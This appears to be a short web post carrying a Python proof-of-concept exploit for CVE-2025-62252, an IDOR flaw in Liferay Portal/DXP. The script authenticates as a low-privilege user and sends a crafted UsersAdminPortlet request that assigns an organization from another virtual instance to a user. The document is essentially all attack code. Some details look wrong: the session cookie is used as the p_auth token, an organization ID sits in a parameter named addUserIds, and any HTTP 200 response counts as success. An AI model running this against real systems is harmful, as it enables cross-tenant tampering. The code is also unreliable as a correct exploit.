CVE-2025-62252 Liferay Portal/DXP IDOR漏洞

# CVE-2025-62252 - Liferay Portal/DXP IDOR Vulnerability PoC # This PoC demonstrates how an authenticated user in one virtual instance # can assign an organization from a different virtual instance to a user. import requests # Target Liferay Portal instance TARGET_URL = "https://target-liferay-instance.com" # Attacker credentials (low-privilege user in Virtual Instance A) ATTACKER_USER = "attacker_user" ATTACKER_PASS = "attacker_password" # Target user ID in Virtual Instance A TARGET_USER_ID = "12345" # Organization ID from Virtual Instance B (different virtual instance) CROSS_INSTANCE_ORG_ID = "67890" # Step 1: Authenticate as the attacker session = requests.Session() login_url = f"{TARGET_URL}/c/portal/login" login_data = { "_com_liferay_login_web_portlet_LoginPortlet_login": ATTACKER_USER, "_com_liferay_login_web_portlet_LoginPortlet_password": ATTACKER_PASS, } session.post(login_url, data=login_data) # Step 2: Exploit the IDOR vulnerability via UsersAdminPortlet # The vulnerable parameter is _com_liferay_users_admin_web_portlet_UsersAdminPortlet_addUserIds exploit_url = f"{TARGET_URL}/group/control_panel/manage?p_p_id=com_liferay_users_admin_web_portlet_UsersAdminPortlet&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view" # Craft the malicious request with cross-virtual-instance organization ID exploit_params = { "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_addUserIds": CROSS_INSTANCE_ORG_ID, "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_cmd": "updateOrganizations", "_com_liferay_users_admin_web_portlet_UsersAdminPortlet_redirect": "", "p_auth": session.cookies.get("JSESSIONID", ""), } # Step 3: Send the exploit request response = session.post(exploit_url, data=exploit_params) if response.status_code == 200: print("[+] IDOR exploit successful - Cross-instance organization assigned!") else: print(f"[-] Exploit failed with status code: {response.status_code}")